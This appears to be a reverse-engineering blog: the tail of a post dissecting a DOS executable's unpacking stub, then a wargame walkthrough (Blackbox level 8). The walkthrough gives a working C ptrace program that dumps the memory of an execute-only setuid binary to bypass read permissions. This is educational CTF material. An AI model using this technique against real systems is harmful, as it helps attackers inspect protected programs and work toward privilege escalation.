Basically a memcpy of a chunk of 0x18a bytes from the beginning of the current segment, to some address located 0x178d paragraphs forward. This chunk is exactly all the code from the start of the segment to the end of the file, which means that the bootstrapping code itself is copied forward in memory to make room for the unpacked data.
One thing to notice is the method with which the code is copied. The addresses loaded into the source (ds:si) and destination (es:di) point to the end of the copied buffers, and the direction flag (DF) is set (by the std instruction) so after each movsb the si and di registers will decrease.
This means that when the copy loop has finished, es:di will point to the end of the free memory (just below the copy of the bootstrapping code) and ds:si will point to the end of the compressed code.
By the way, two words in the data section can now be named:

word_0xc = bootstrap code size
word_0xa = unpacked code paragraphs

00000025  53                push bx
00000026  B82B00            mov ax,0x2b
00000029  50                push ax
0000002A  CB                retf

This just pushes the new segment address of the copy of the bootstrap code (in bx), and then the offset 0x2b, making the retf serve as a far jump to bx:0x2b. Since there is no difference between the running code and its copy, we can just look at offset 0x2b in the current code to see where the program will continue execution.

0000002B  2E8B2E0800        mov bp,[cs:0x8]
00000030  8CDA              mov dx,ds
00000032  89E8              mov ax,bp
00000034  3D0010            cmp ax,0x1000
00000037  7603              jna 0x3c
00000039  B80010            mov ax,0x1000
0000003C  29C5              sub bp,ax
0000003E  29C2              sub dx,ax
00000040  29C3              sub bx,ax
00000042  8EDA              mov ds,dx
00000044  8EC3              mov es,bx
00000046  B103              mov cl,0x3
00000048  D3E0              shl ax,cl
0000004A  89C1              mov cx,ax
0000004C  D1E0              shl ax,1
0000004E  48                dec ax
0000004F  48                dec ax
00000050  8BF0              mov si,ax
00000052  8BF8              mov di,ax
00000054  F3A5              rep movsw
00000056  09ED              or bp,bp
00000058  75D8              jnz 0x32

Translated to C (almost, I will use segmented addressing notation), the code above will look like this:

paragraphs_left = compressed_code_paragraphs;
while (paragraphs_left > 0) {
    if (paragraphs_left < 0x1000) {
        paragraphs_to_copy = paragraphs_left;
    } else {
        paragraphs_to_copy = 0x1000;
    }
    paragraphs_left -= paragraphs_to_copy;
    source_segment -= paragraphs_to_copy;
    destination_segment -= paragraphs_to_copy;
    source_offset = destination_offset = paragraphs_to_copy * 16 - 2;
    words_to_copy = paragraphs_to_copy * 8;
    while (words_to_copy > 0) {
        *destination_segment:destination_offset = *source_segment:source_offset;
        destination_offset -= 2;
        source_offset -= 2;
        words_to_copy--;
    }
}

All this does is copy the packed code to the area adjacent and below the copy of the bootstrapping code.
The reason for copying in "chunks" is that you can only address 64KiB within a segment, that's 0x1000 paragraphs. So every 64KiB, the segment addresses of both the source and destination need to be readjusted.
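A few lines of Python show both the chunk sizes this loop produces for DAVE.EXE and why a step of 0x1000 paragraphs is exactly one 64KiB window. This is a sketch only; the function names are mine, and linear_address is the usual real-mode segment * 16 + offset formula.

```python
def copy_chunks(total_paragraphs: int, max_chunk: int = 0x1000) -> list:
    """Sizes (in paragraphs) of the successive chunks the loop copies."""
    chunks = []
    left = total_paragraphs
    while left:
        size = min(left, max_chunk)   # cmp ax, 0x1000 / jna
        chunks.append(size)
        left -= size                  # sub bp, ax
    return chunks


def linear_address(segment: int, offset: int) -> int:
    """Real-mode address: segment * 16 + offset, wrapped to 20 bits."""
    return ((segment << 4) + offset) & 0xFFFFF


print([hex(c) for c in copy_chunks(0x1298)])                      # ['0x1000', '0x298']
print(hex(linear_address(0x2000, 0) - linear_address(0x1000, 0)))  # 0x10000
```

So for this file the loop runs twice: one full 64KiB chunk, then the remaining 0x298 paragraphs.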
After all the code/data is in place, the unpacking can begin.
First, make sure the source pointer points to the copy of the packed code, and the destination pointer points to the program's first segment (the beginning of the original packed code):

0000005B  8EC2              mov es,dx
0000005D  8EDB              mov ds,bx
0000005F  31F6              xor si,si
00000061  31FF              xor di,di

Now starts the unpacking routine. Because I don't want to paste a wall of code and then discuss its analysis, I will outline the unpacking algorithm, and then analyze small chunks of asm code to fill in the details.

Unpacker

The basic idea is that the packed code is composed of control data which comes in words, and regular data whose handling is specified by the control data.

00000063  BA1000            mov dx,0x10

So, dx is loaded with 16 (which is the number of bits in a word).

00000066  AD                lodsw
00000067  89C5              mov bp,ax

Then a word from the packed code is loaded into bp.

00000069  D1ED              shr bp,1
0000006B  4A                dec dx
0000006C  7505              jnz 0x73
0000006E  AD                lodsw
0000006F  89C5              mov bp,ax
00000071  B210              mov dl,0x10

This is a piece of code which will repeat a lot. What it does is shift the LSB of the control word into the CF, then update the remaining bits count (in dx) and if it has reached 0, the next control word is loaded into bp and the remaining bits count is reset.

00000073  7303              jnc 0x78
00000075  A4                movsb
00000076  EBF1              jmp short 0x69

This code actually handles the bit we pushed from the control word into the CF. If CF is set (control bit was 1) then copy a byte from the packed code to the unpacked code as-is and continue reading the next control bit. Otherwise (control bit was 0) continue with:

00000078  31C9              xor cx,cx

Reset cx.

0000007A  D1ED              shr bp,1
0000007C  4A                dec dx
0000007D  7505              jnz 0x84
0000007F  AD                lodsw
00000080  89C5              mov bp,ax
00000082  B210              mov dl,0x10

This should be familiar from before, just read the next bit and load a new word if needed.

00000084  7222              jc 0xa8

We will handle the case where the control bit is '1' later. If, however, the control bit was '0':

00000086  D1ED              shr bp,1
00000088  4A                dec dx
00000089  7505              jnz 0x90
0000008B  AD                lodsw
0000008C  89C5              mov bp,ax
0000008E  B210              mov dl,0x10

Load the next control bit into CF.

00000090  D1D1              rcl cx,1

And push it into cx (from right to left).

00000092  D1ED              shr bp,1
00000094  4A                dec dx
00000095  7505              jnz 0x9c
00000097  AD                lodsw
00000098  89C5              mov bp,ax
0000009A  B210              mov dl,0x10

Read another control bit

0000009C  D1D1              rcl cx,1

And shift it into cx too. So what we get in essence is the two control bits in reverse order in cx.

0000009E  41                inc cx
0000009F  41                inc cx

Add 2 to cx.

000000A0  AC                lodsb
000000A1  B7FF              mov bh,0xff
000000A3  8AD8              mov bl,al

Load the next byte from the packed code into bl, and put 0xff in bh. This will result in bx containing the signed (and negative) value of read_byte-256.

000000A5  E91300            jmp word 0xbb

Continue execution at:

000000BB  268A01            mov al,[es:bx+di]
000000BE  AA                stosb
000000BF  E2FA              loop 0xbb
000000C1  EBA6              jmp short 0x69

This is equivalent to:

while (cx-- > 0) {
    *destination_segment:destination_offset = *destination_segment:(destination_offset + bx);
    destination_offset++;
}

This code copies a chunk of cx bytes from already unpacked code (remember bx < 0) to the head of the unpacked code. This means that:

The byte that was loaded into bx represents an offset.
The two bits (+2) which were loaded into cx represent a length.
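
The copy loop can be sketched in Python as follows (the function name is hypothetical). Because the bytes are copied one at a time, the source range may overlap the bytes being written, which lets a short back-reference repeat a pattern:

```python
def copy_back(out, offset, length):
    """Append `length` bytes to `out`, each read `offset` bytes back (offset < 0)."""
    for _ in range(length):
        # Equivalent of mov al,[es:bx+di] / stosb with bx = offset, di = len(out)
        out.append(out[len(out) + offset])


out = bytearray(b"ab")
copy_back(out, -2, 5)
print(out)  # bytearray(b'abababa')
```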

Let's recap before we continue.
The packed code is composed of control words, which are read bit-by-bit from LSB to MSB.
If we encounter a 1, we copy the next byte in the packed code to the unpacked code as-is.
If we encounter two 0's in a row, we need to copy N+2 bytes from the current position in the unpacked data plus D-256 (that is, 256-D bytes back), where N is the next two bits in the control word, and D is the next byte in the packed code.
How about if we read a 0 and then a 1? Well, that's the case I said we'll do later.

000000A8  AD                lodsw
000000A9  8BD8              mov bx,ax

Read a word from the packed data into ax (and bx).

000000AB  B103              mov cl,0x3
000000AD  D2EF              shr bh,cl
000000AF  80CFE0            or bh,0xe0
000000B2  80E407            and ah,0x7

This code separates two values encoded into the word. The 3 least significant bits of the high byte are kept in ah, while the remaining 5 most significant bits are shifted right into the low bits of bh. The "or bh,0xe0" then sets the 3 top bits, which causes bx to contain the signed (and negative) value of the shifted 13-bit value - 8192.
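
To make the bit-twiddling concrete, here is a small Python sketch of the same split. The function name is invented for illustration:

```python
def split_long_form(word):
    """Split the 16-bit word the way the stub does between 0xa8 and 0xb2."""
    lo, hi = word & 0xFF, word >> 8
    n = hi & 0x07                  # and ah,0x7: the 3-bit length field
    d = ((hi >> 3) << 8) | lo      # shr bh,3: a 13-bit value is left in bx
    offset = d - 8192              # or bh,0xe0: same as subtracting 8192
    return n, offset


print(split_long_form(0x0A34))  # (2, -7884)
```

For 0x0A34 the stub ends up with bx = 0xE134, which is -7884 when read as a signed 16-bit value.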

000000B5  740C              jz 0xc3

We will handle the case in which ah turned out to be 0 later. If ah was not 0:

000000B7  88E1              mov cl,ah
000000B9  41                inc cx
000000BA  41                inc cx

Just sets cx to ah+2.

000000BB  268A01            mov al,[es:bx+di]
000000BE  AA                stosb
000000BF  E2FA              loop 0xbb
000000C1  EBA6              jmp short 0x69

This is the same copy loop we analyzed before. This means that the 3 least-significant bits in the high byte are an encoded length (-2), and the rest of the word, when recombined, is the offset. Notice that while in the previous case the copied chunk's length was limited to 5 bytes, and the offset to 256, here the length is limited to 9 bytes, and the offset to 8192. How about that case in which the length we read is 0? Well:

000000C3  AC                lodsb

Read another byte from the packed code.

000000C4  08C0              or al,al
000000C6  7434              jz 0xfc
000000C8  3C01              cmp al,0x1
000000CA  7405              jz 0xd1

I'll cover the cases in which the read byte is 0 or 1 later.

000000CC  88C1              mov cl,al
000000CE  41                inc cx
000000CF  EBEA              jmp short 0xbb

If the read byte is bigger than 1, then load cx with that value + 1, and jump to the copying code. This means that the byte we read specified a length. Now let's handle the case in which that byte was 1:

000000D1  89FB              mov bx,di
000000D3  83E70F            and di,byte +0xf
000000D6  81C70020          add di,0x2000
000000DA  B104              mov cl,0x4
000000DC  D3EB              shr bx,cl
000000DE  8CC0              mov ax,es
000000E0  01D8              add ax,bx
000000E2  2D0002            sub ax,0x200
000000E5  8EC0              mov es,ax
000000E7  89F3              mov bx,si
000000E9  83E60F            and si,byte +0xf
000000EC  D3EB              shr bx,cl
000000EE  8CD8              mov ax,ds
000000F0  01D8              add ax,bx
000000F2  8ED8              mov ds,ax
000000F4  E972FF            jmp word 0x69

Remember that I mentioned earlier that we can't address more than 64KiB within a segment? Well, this limit could be reached while we are copying bytes to the uncompressed code. To avoid it, we need to readjust the segment addresses of both the source and destination segments. This is exactly what the code does: for each of the addresses, it adds the number of paragraphs which fit inside the offset to the segment address, and leaves the remainder in the offset. For the destination, it also keeps 0x2000 bytes in the offset (and takes the matching 0x200 paragraphs back off the segment), so that back-references reaching up to 8192 bytes behind stay addressable. Ignoring that extra shift for a moment, if es:di = 0x1234:0x5678:

We can fit 0x567 paragraphs in 0x5678 bytes.
Add 0x567 to the segment address to obtain 0x179b.
The remainder, 0x8, is left in the offset.
The readjusted address, 0x179b:0x0008, is equivalent to 0x1234:0x5678 (you can check yourself by comparing the linear addresses), but the addressing limitation within the segment has been overcome.
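
The arithmetic is easy to check with a few lines of Python. The helper names are hypothetical; normalize_destination mirrors the extra "add di,0x2000" / "sub ax,0x200" that the stub applies to es:di only:

```python
def normalize(segment, offset):
    """Move whole paragraphs (16 bytes each) from the offset into the segment."""
    return (segment + (offset >> 4)) & 0xFFFF, offset & 0xF


def normalize_destination(segment, offset):
    """Same, but leave 0x2000 bytes in the offset, as done for es:di."""
    seg, off = normalize(segment, offset)
    return (seg - 0x200) & 0xFFFF, off + 0x2000


def linear(segment, offset):
    """20-bit real-mode linear address of segment:offset."""
    return ((segment << 4) + offset) & 0xFFFFF


print([hex(v) for v in normalize(0x1234, 0x5678)])              # ['0x179b', '0x8']
print([hex(v) for v in normalize_destination(0x1234, 0x5678)])  # ['0x159b', '0x2008']
print(hex(linear(0x1234, 0x5678)))                              # 0x179b8
```

All three forms point at the same linear address, 0x179b8.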

This just leaves the last case of the read byte being 0. Well, that's the "end-of-stream" marker, which means the unpacking process is done.

So to summarize the unpacking algorithm (I use C to denote the current offset in the output):

The packed code contains control words.
The control words are read bit-by-bit from LSB to MSB.
1 - read the next byte from the stream and copy it to the output as-is.
00 - Read the next two bits from the control into N. Read the next byte from the stream into D. Copy N+2 bytes from C+D-256 to the output.
01 - Read the next word from the stream. Extract N from the 3 LSBs of the high byte, and D from the word that results from right-shifting the high byte by 3. Then:

If N > 0, copy N+2 bytes from C+D-8192 to the output.
If N = 0, read one more byte from the stream into L:
L = 0: this is the end of the stream, we are done.
L = 1: we need to readjust the segments.
L > 1: copy L+1 bytes from C+D-8192 to the output.
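
Put together, the cases traced in the disassembly fit in a short Python sketch. It is an illustration under assumptions, not a tested unpacker for DAVE.EXE: the function name is made up, `packed` is assumed to start at the first control word, and the output is a flat buffer, so the segment readjustment becomes a no-op. It follows the branches at 0xb5 and 0xc3..0xcf: a zero 3-bit length means one more byte is read, and that byte selects end-of-stream (0), readjustment (1) or a longer copy.

```python
import struct


def unpack(packed):
    """Sketch of the stub's unpacking loop over a flat output buffer."""
    out = bytearray()
    pos = 0
    word = left = 0

    def load():
        nonlocal pos, word, left
        (word,) = struct.unpack_from("<H", packed, pos)   # lodsw
        pos += 2
        left = 16

    def bit():
        nonlocal word, left
        b = word & 1                # shr bp,1
        word >>= 1
        left -= 1                   # dec dx
        if left == 0:
            load()                  # refill before any further data is read
        return b

    def copy(offset, length):
        for _ in range(length):
            out.append(out[len(out) + offset])

    load()
    while True:
        if bit():                                   # 1: literal byte
            out.append(packed[pos])
            pos += 1
        elif not bit():                             # 00: short match
            n = (bit() << 1) | bit()                # first bit read is the high bit
            d = packed[pos]
            pos += 1
            copy(d - 256, n + 2)
        else:                                       # 01: long match or special
            lo, hi = packed[pos], packed[pos + 1]
            pos += 2
            offset = (((hi >> 3) << 8) | lo) - 8192
            n = hi & 7
            if n:
                copy(offset, n + 2)
                continue
            extra = packed[pos]
            pos += 1
            if extra == 0:
                return bytes(out)                   # end of stream
            if extra == 1:
                continue                            # segment readjustment only
            copy(offset, extra + 1)


# Hand-made stream: literals "abc", a short match of 5 bytes at -3, then the end marker.
print(unpack(b"\x67\x01abc\xfd\x00\x00\x00"))  # b'abcabcab'
```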

This algorithm specification is actually enough to be able to unpack the code.
But in reality, the bootstrapping is not over yet. For one, the control needs to be passed to the unpacked code.
So for the sake of being thorough, let's continue just a bit more.

Relocation

When the end-of-stream has been reached, we jump to:

000000FC  0E                push cs
000000FD  1F                pop ds
000000FE  BE5801            mov si,0x158

Set ds to the current code segment, and load si with 0x158. This leads me to suspect that ds:si is now pointing to some data at the tail of the code:

$ xxd DAVE.EXE |grep -A20 "12af0:"
0012af0: 8ed6 8be7 fb2e ff2f 01dd 3200 3910 1530  ......./..2.9..0
0012b00: 2515 0015 3e12 00ed 1019 2000 0b14 00f0  %...>..... .....
0012b10: 0100 5e01 c85a 008d 0900 670a 5b87 4cdd  ..^..Z....g.[.L.
0012b20: 7400 8a01 0081 0200 0100                 t.........

Not that this data will be of much use to us.

00000101  5B                pop bx
00000102  83C310            add bx,byte +0x10
00000105  89DA              mov dx,bx

OK, remember from way way before, when I said that the PSP segment was pushed to the stack? Well, it's still there (so far all the stack operations were balanced). The size of the PSP is 256 bytes, or 0x10 (16) paragraphs, so bx holds the segment address immediately following the PSP, which is also the start of the code, this time the unpacked code.

00000107  31FF              xor di,di
00000109  AC                lodsb
0000010A  08C0              or al,al
0000010C  7416              jz 0x124
0000010E  B400              mov ah,0x0
00000110  01C7              add di,ax
00000112  8BC7              mov ax,di
00000114  83E70F            and di,byte +0xf
00000117  B104              mov cl,0x4
00000119  D3E8              shr ax,cl
0000011B  01C2              add dx,ax
0000011D  8EC2              mov es,dx
0000011F  26011D            add [es:di],bx
00000122  EBE5              jmp short 0x109
00000124  AD                lodsw
00000125  09C0              or ax,ax
00000127  7508              jnz 0x131
00000129  81C2FF0F          add dx,0xfff
0000012D  8EC2              mov es,dx
0000012F  EBD8              jmp short 0x109
00000131  3D0100            cmp ax,0x1
00000134  75DA              jnz 0x110

I'll spare you the deep analysis, but what happens here is this:

That data contains offsets to addresses which need to be relocated.
These offsets are cumulative (the offset to relocation address N is the sum of the first N entries in the table).
For each relocation address, the segment address of the code start is added to the segment address in the code.
The way these offsets are encoded is that each offset is a byte, unless that byte is 0, in which case the offset is the word that follows.
Two values of that word are special: 0 advances the segment by 0xfff paragraphs without relocating anything, and 1 ends the iteration.
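
For the curious, the loop between 0x107 and 0x134 can be sketched in Python like this. The function name and the flat `image` buffer are assumptions made for illustration; `base_seg` stands in for bx. The sketch also handles the word value 0, which the code at 0x129 treats as "advance the segment by 0xfff paragraphs and read on":

```python
import struct


def apply_relocations(image, table, base_seg):
    """Add base_seg to every 16-bit word the relocation table points at."""
    pos = 0       # read position in the table (si)
    target = 0    # offset of the current relocation from the start of the image
    while True:
        delta = table[pos]
        pos += 1
        if delta == 0:
            (delta,) = struct.unpack_from("<H", table, pos)
            pos += 2
            if delta == 0:
                target += 0xFFF0    # add dx,0xfff (counted in paragraphs)
                continue
            if delta == 1:
                return image        # end of the table
        target += delta
        (value,) = struct.unpack_from("<H", image, target)
        struct.pack_into("<H", image, target, (value + base_seg) & 0xFFFF)
```

The real code keeps the position split between dx and di and renormalizes it on every step. Tracking a single linear offset gives the same addresses for any table the stub would process without di overflowing.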

This sums up the relocation process.

Wrapping up

The only thing left is jumping into the unpacked (and relocated) code to start the game:

00000136  8BC3              mov ax,bx

The segment address of the code start is loaded into ax.

00000138  8B3E0400          mov di,[0x4]        ; di = var_0x4
0000013C  8B360600          mov si,[0x6]
00000140  01C6              add si,ax           ; si = var_0x6 + reloc
00000142  01060200          add [0x2],ax        ; var_0x2 += reloc
00000146  2D1000            sub ax,0x10
00000149  8ED8              mov ds,ax           ; ds = PSP segment
0000014B  8EC0              mov es,ax           ; es = PSP segment
0000014D  31DB              xor bx,bx           ; bx = 0
0000014F  FA                cli
00000150  8ED6              mov ss,si           ; ss = var_0x6 + reloc
00000152  8BE7              mov sp,di           ; sp = var_0x4
00000154  FB                sti

This code just sets up the initial stack address (segment & offset), which also means that we can identify var_0x6 as the initial stack segment and var_0x4 as the initial stack offset. The code also adds the segment address of the code start to var_0x2, relocating it. The next (and last) instruction will reveal why:

00000155  2EFF2F            jmp word far [cs:bx]

This is a far jump, meaning that the address is loaded from two words at cs:0: the first (var_0x0) is the offset, and the second (var_0x2) is the segment, which means that the entry point in the unpacked code is simply its beginning.

That's it for the easy and fun part; next time I will start reverse engineering the code we have just unpacked.

Saturday, January 28, 2012

Blackbox - chapter 8

As in the previous posts, the password for the next level has been replaced with question marks so as to not make this too obvious, and so that the point of the walkthrough, which is mainly educational, will not be missed.

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Let's see what level 8 holds in store:

$ ssh -p 2225 level8@blackbox.smashthestack.org
level8@blackbox.smashthestack.org's password:
...
level8@blackbox:~$ ls -l
total 16
-rw-r--r-- 1 root   root      10 2008-01-24 05:58 password
-rws--x--x 1 level9 level9 12254 2007-12-29 14:10 secrets

Wait a minute here, what's that? We only have execution permissions for secrets.
How can we analyze it if we can't even read it?
Well, there is a way, using ptrace sorcery. I won't go into too much depth here, so I recommend you read Playing with ptrace, Part I (I'd also recommend you read part II, just for general knowledge).
Anyway, to summarize these articles, the way debuggers work is by forking, invoking ptrace with PTRACE_TRACEME in the child, and then executing the to-be-traced process. The parent process can then control the child process and read its status using other ptrace calls.
So let's write a little program that does just that, and reads the memory contents of the child process, where the child process will be secrets. This is how we can cheat the permission mechanism.

level8@blackbox:/tmp$ cat > wrap.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    pid_t pid;
    char *prog[] = {"/home/level8/secrets", NULL};
    unsigned long addr;
    unsigned long size;
    unsigned long i;
    long val;
    if (argc != 3) {
        printf("Usage: %s <address> <number of long words>\n", argv[0]);
        return 1;
    }
    addr = strtoul(argv[1], NULL, 16);
    size = strtoul(argv[2], NULL, 10);
    pid = fork();
    if (0 == pid) {
        /* Child: ask to be traced, then become the target program. */
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        execve(prog[0], prog, NULL);
    } else {
        /* Parent: the child stops at the exec, so its memory can be read. */
        wait(NULL);
        for (i = 0; i < size; ++i) {
            /* Assumes 4-byte long words (32-bit target). */
            val = ptrace(PTRACE_PEEKTEXT, pid, addr + 4*i, NULL);
            /* Print the bytes in memory order (little-endian). */
            printf("%02lx", val & 0xFF);
            printf("%02lx", (val >> 8) & 0xFF);
            printf("%02lx", (val >> 16) & 0xFF);
            printf("%02lx", (val >> 24) & 0xFF);
        }
        printf("\n");
        ptrace(PTRACE_KILL, pid, NULL, NULL);
    }
    return 0;
}

level8@blackbox:/tmp$ gcc -o wrap wrap.c

As you can see, the child just invokes ptrace with PTRACE_TRACEME and executes the level's program.
The parent waits for the child to stop, and then reads the specified amount of long words from the specified address, prints them out encoded as a hex string, and then kills the child.
Let's try out our new toy, but which address interests us? Well, the function main commonly starts at 0x08048464. As for the number of long words to read, let's pick some large amount; I'm sure main isn't too long:

level8@blackbox:/tmp$ ./wrap 0x08048464 200
5589e55381ec3404000083e4f0b80000000029c4c745f464870408c7042475870408e8cdfeffff8945f0c
785e4fbffff000000008b45f0890424e8c5feffff483985e4fbffff734781bde4fbfffffb0300007602eb
398d85e8fbffff89c3039de4fbffff8b85e4fbffff0345f08d48018b85e4fbffff0345f00fb6100fb6012
8d0045a88038d85e4fbffffff00eba58d85e8fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600c0
f804240f042188028d85e9fbffff89c20395e4fbffff8b85e4fbffff0345f00fb600240f042188028d85e
afbffff0385e4fbffffc60000c785e4fbffff000000008d85e8fbffff890424e80bfeffff483985e4fbff
ff7205e99b0000008d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4fbffff8d85e9fbffff0
385e4fbffff0fb600320288018d85e9fbffff89c1038de4fbffff8d85e9fbffff89c20395e4fbffff8d85
e8fbffff0385e4fbffff0fb600320288018d85e8fbffff89c1038de4fbffff8d85e8fbffff89c20395e4f
bffff8d85e9fbffff0385e4fbffff0fb600320288018d85e4fbffff830002e949ffffff8d95e8fbffff8b
45f489442404891424e81dfdffff85c0751ac7042492870408e85dfdffffc704249b870408e811fdffffe
b0cc70424a3870408e843fdffffb8000000008b5dfcc9c3905589e5575631f65383ec0ce8a000000081c3
44120000e8a5fcffff8d9314ffffff8d8314ffffff29c2c1fa0239d6731c89d78db426000000008dbc270
0000000ff94b314ffffff4639fe72f483c40c5b5e5f5dc38db6000000008dbf000000005589e583ec0889
1c24e84200000081c3e6110000897424048d8314ffffff8d9314ffffff29d0c1f80285c08d70ff7510e85
b0000008b1c248b74240489ec5dc3ff94b314ffffff89f04e85c075f2ebe08b1c24c39090909090909090
909090905589e55383ec04bb90980408a19098040883f8ff74168d76008dbc270000000083eb04ffd08b0
383f8ff75f4585b5dc35589e553e8000000005b81c35b11000052e89afcffff8b5dfcc9c3000300000001
000200555b5b5a526357666358564d246c222300506c6561736520656e74657220796f

Now, to disassemble this I will use ndisasm (part of nasm), which is not installed on the blackbox server. First I'll decode the hex string into a binary file which I will call main.bin, and then I will disassemble it at the base address of main:
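
The decoding step could be done with a few lines of Python 3, for example. The function name is hypothetical; the whitespace is stripped first because the wrapped lines of the dump may split a byte in the middle:

```python
def hex_dump_to_bytes(text):
    """Join the wrapped lines of hex output and decode them to raw bytes."""
    return bytes.fromhex("".join(text.split()))


# The first bytes of the dump, deliberately wrapped in the middle of a byte.
sample = "5589e5538\n1ec3404"
print(hex_dump_to_bytes(sample).hex())  # 5589e55381ec3404
```

Writing the result out is then a matter of `open("main.bin", "wb").write(hex_dump_to_bytes(dump))`, with `dump` holding the pasted output of wrap.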

~$ ndisasm -u -o 0x08048464 main.bin |cat -n|grep ret
   124 0804864E  C3                ret
   154 080486A3  C3                ret
   176 080486EF  C3                ret
   184 08048703  C3                ret
   215 0804873F  C3                ret
   226 0804875A  C3                ret
~$ ndisasm -u -o 0x08048464 main.bin | head -n 124
08048464  55                push ebp
08048465  89E5              mov ebp,esp
08048467  53                push ebx
08048468  81EC34040000      sub esp,0x434
0804846E  83E4F0            and esp,byte -0x10
08048471  B800000000        mov eax,0x0
08048476  29C4              sub esp,eax
08048478  C745F464870408    mov dword [ebp-0xc],0x8048764
0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax
0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3
080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498
080484F3  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[ebp-0x41c]
08048501  8B85E4FBFFFF      mov eax,[ebp-0x41c]
08048507  0345F0            add eax,[ebp-0x10]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al
08048516  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[ebp-0x41c]
08048524  8B85E4FBFFFF      mov eax,[ebp-0x41c]
0804852A  0345F0            add eax,[ebp-0x10]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al
08048536  8D85EAFBFFFF      lea eax,[ebp-0x416]
0804853C  0385E4FBFFFF      add eax,[ebp-0x41c]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000
0804854F  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [ebp-0x41c],eax
08048564  7205              jc 0x804856b
08048566  E99B000000        jmp dword 0x8048606
0804856B  8D85E8FBFFFF      lea eax,[ebp-0x418]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[ebp-0x41c]
08048579  8D85E8FBFFFF      lea eax,[ebp-0x418]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[ebp-0x41c]
08048587  8D85E9FBFFFF      lea eax,[ebp-0x417]
0804858D  0385E4FBFFFF      add eax,[ebp-0x41c]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485A8  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[ebp-0x41c]
080485B6  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485BC  0385E4FBFFFF      add eax,[ebp-0x41c]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[ebp-0x41c]
080485D7  8D85E8FBFFFF      lea eax,[ebp-0x418]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[ebp-0x41c]
080485E5  8D85E9FBFFFF      lea eax,[ebp-0x417]
080485EB  0385E4FBFFFF      add eax,[ebp-0x41c]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al
080485F8  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f
08048606  8D95E8FBFFFF      lea edx,[ebp-0x418]
0804860C  8B45F4            mov eax,[ebp-0xc]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639
0804861F  C7042492870408    mov dword [esp],0x8048792
08048626  E85DFDFFFF        call dword 0x8048388
0804862B  C704249B870408    mov dword [esp],0x804879b
08048632  E811FDFFFF        call dword 0x8048348
08048637  EB0C              jmp short 0x8048645
08048639  C70424A3870408    mov dword [esp],0x80487a3
08048640  E843FDFFFF        call dword 0x8048388
08048645  B800000000        mov eax,0x0
0804864A  8B5DFC            mov ebx,[ebp-0x4]
0804864D  C9                leave
0804864E  C3                ret

I hope you don't mind that we switched from the gas syntax to the Intel syntax, but it's good to learn to read both.
Anyway, since we disassembled raw code, we don't have any symbolic information, so we are going to have to guess what each function is based on context. So let's start:

08048478  C745F464870408    mov dword [ebp-0xc],0x8048764

This loads the local variable at ebp-0xc with some constant which looks like an address in the data section. Let's use our tool again to read what's in that address.

